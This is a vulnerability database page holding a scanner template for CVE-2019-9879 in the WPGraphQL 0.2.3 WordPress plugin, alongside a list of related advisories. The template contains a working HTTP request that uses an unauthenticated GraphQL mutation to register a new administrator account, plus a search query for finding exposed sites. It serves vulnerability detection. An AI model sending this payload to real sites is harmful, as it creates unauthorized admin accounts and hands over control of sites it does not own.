| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| WordPress WPGraphQL 0.2.3 Plugin - Multiple Vulnerabilities | 21 May 201900:00 | – | zdt | |
| CVE-2019-9879 | 10 Jun 202522:14 | – | circl | |
| WordPress WPGraphQL Access Control Error Vulnerability (CNVD-2019-27673) | 23 May 201900:00 | – | cnvd | |
| WordPress Plugin WPGraphQL Information Disclosure (CVE-2019-9879; CVE-2019-9880; CVE-2019-9881) | 24 Jun 201900:00 | – | checkpoint_advisories | |
| CVE-2019-9879 | 10 Jun 201917:28 | – | cve | |
| CVE-2019-9879 | 10 Jun 201917:28 | – | cvelist | |
| CVE-2019-9879 | 10 Jun 201918:29 | – | nvd | |
| WordPress WPGraphQL 0.2.3 Authentication Bypass / Information Disclosure | 21 May 201900:00 | – | packetstorm | |
| Design/Logic Flaw | 10 Jun 201918:29 | – | prion | |
| PT-2019-19912 · WordPress · Wpgraphql | 10 Jun 201900:00 | – | ptsecurity |
id: CVE-2019-9879
info:
name: WPGraphQL 0.2.3 - User Creation
author: DhiyaneshDk
severity: critical
description: |
The WPGraphQL 0.2.3 plugin for WordPress allows remote attackers to register a new user with admin privileges, whenever new user registrations are allowed. This is related to the registerUser mutation.
impact: |
Attackers can create admin users, leading to full control over the WordPress site.
remediation: |
Update to the latest version of WPGraphQL or apply security patches to restrict user registration permissions.
reference:
- https://github.com/wp-graphql/wp-graphql/releases/tag/v0.3.0
- https://github.com/pentestpartners/snippets/blob/master/wp-graphql0.2.3_exploit.py
- https://wpscan.com/vulnerability/2d451c89-91ce-4151-b3fb-56af15869644/
- https://nvd.nist.gov/vuln/detail/CVE-2019-9879
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-9879
cwe-id: CWE-306
epss-score: 0.76189
epss-percentile: 0.98945
cpe: cpe:2.3:a:wpengine:wpgraphql:0.2.3:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: wpengine
product: wpgraphql
framework: wordpress
fofa-query: body="/wp-content/plugins/wp-graphql/"
tags: cve,cve2019,wp-graphql,wpengine,wordpress,wp-plugin,intrusive,vkev,vuln
variables:
username: "{{to_lower(rand_text_alphanumeric(6))}}"
password: "{{rand_text_alphanumeric(12)}}"
user_email: "{{username}}@{{to_lower(rand_text_alphanumeric(6))}}.com"
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-type: application/json
{"query": "mutation{registerUser(input:{clientMutationId:\"UWHATM8\",email:\"{{user_email}}\",password:\"{{password}}\",username:\"{{username}}\",roles:[\"administrator\"]}){clientMutationId}}"}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(content_type, 'application/json')
- contains_all(body, 'UWHATM8', '{\"status\":')
condition: and
# digest: 490a004630440220348d87b5c8b0224e094f831918eb26778e278efd183c80cfbed7dcbc20c4884802203c021b0cb629894931ecc21233444efe7bc95ab997ab28ccd2b80bc052811134:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation